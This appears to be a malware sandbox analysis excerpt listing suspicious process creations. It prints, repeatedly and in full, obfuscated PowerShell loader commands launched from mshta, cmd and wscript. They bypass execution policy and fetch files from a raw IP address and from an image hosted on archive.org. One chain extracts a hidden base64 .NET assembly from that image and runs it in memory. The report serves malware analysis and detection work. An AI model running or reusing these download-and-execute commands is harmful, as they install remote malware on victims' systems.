kFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
                    Suspicious command line found
                    Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
                    Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
                    Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"Jump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"Jump to behavior
                    Suspicious powershell command line found
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJsJysneV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkknKydudm9rZSh7MX1udWxsLCBAKHswfXR4dC5IR0dDUlIvMDMzLzA0LjAyMi4zLjI5MS8vJysnOnB0dGh7MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sICcrJ3swfWRlcycrJ2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3snKycwfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRiBbQ2hhcl0zOSxbQ2hhcl0zNil8IGludm9rZS1leHByZXNTSW9u';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJsJysneV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkknKydudm9rZSh7MX1udWxsLCBAKHswfXR4dC5IR0dDUlIvMDMzLzA0LjAyMi4zLjI5MS8vJysnOnB0dGh7MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sICcrJ3swfWRlcycrJ2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3snKycwfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRiBbQ2hhcl0zOSxbQ2hhcl0zNil8IGludm9rZS1leHByZXNTSW9u';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon"
